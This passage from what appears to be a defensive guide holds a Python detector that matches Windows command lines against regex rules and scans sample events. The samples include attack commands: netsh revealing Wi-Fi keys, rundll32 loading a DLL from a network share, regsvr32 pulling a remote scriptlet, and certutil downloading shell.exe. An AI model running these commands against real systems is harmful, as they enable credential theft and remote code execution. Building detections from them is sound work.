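     re.compile(r"\bcertutil(?:\.exe)?\b.*-urlcache\b.*https?://", re.I)),
]


def classify(cmdline):
    """Return the tags of every rule that fires on one command line."""
    return [tag for tag, rx in RULES if rx.search(cmdline)]


def scan(events):
    """events: iterable of (host, user, cmdline). Returns one alert per matching event."""
    alerts = []
    for host, user, cmdline in events:
        tags = classify(cmdline)
        if tags:
            alerts.append({"host": host, "user": user, "tags": tags, "cmdline": cmdline})
    return alerts


# Constructed sample events: the posts' commands plus benign look-alikes.
SAMPLE_EVENTS = [
    ("WS01", "raj", r"netsh wlan show profiles"),                                   # benign enumeration
    ("WS01", "raj", r'netsh wlan show profile name="Linuxlab" key=clear'),
    ("WS01", "raj", r"rundll32.exe \\192.168.1.107\ZtmW\test.dll,0"),
    ("WS01", "raj", r"rundll32 shell32.dll,Control_RunDLL C:\Users\raj\Downloads\1.dll"),
    ("WS01", "SYSTEM", r"rundll32 shell32.dll,Control_RunDLL C:\Windows\System32\appwiz.cpl"),  # benign
    ("WS02", "raj", r"regsvr32 /s /n /u /i:http://192.168.1.109:8080/xo31Jt5dIF.sct scrobj.dll"),
    ("WS02", "SYSTEM", r"regsvr32 /s C:\Windows\System32\msxml6.dll"),              # benign registration
    ("WS02", "raj", r"certutil.exe -urlcache -split -f http://192.168.1.109/shell.exe"),
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"{alert['host']} {alert['user']:<7} {','.join(alert['tags']):<28} {alert['cmdline']}")
```

Tune before deploying: helpdesk staff do run netsh ... key=clear, and installers register DLLs with regsvr32 all day, so the benign look-alikes in the sample are there to show where the rules deliberately stay quiet. The remote-scriptlet and UNC-DLL rules, on the other hand, have almost no legitimate use on a workstation.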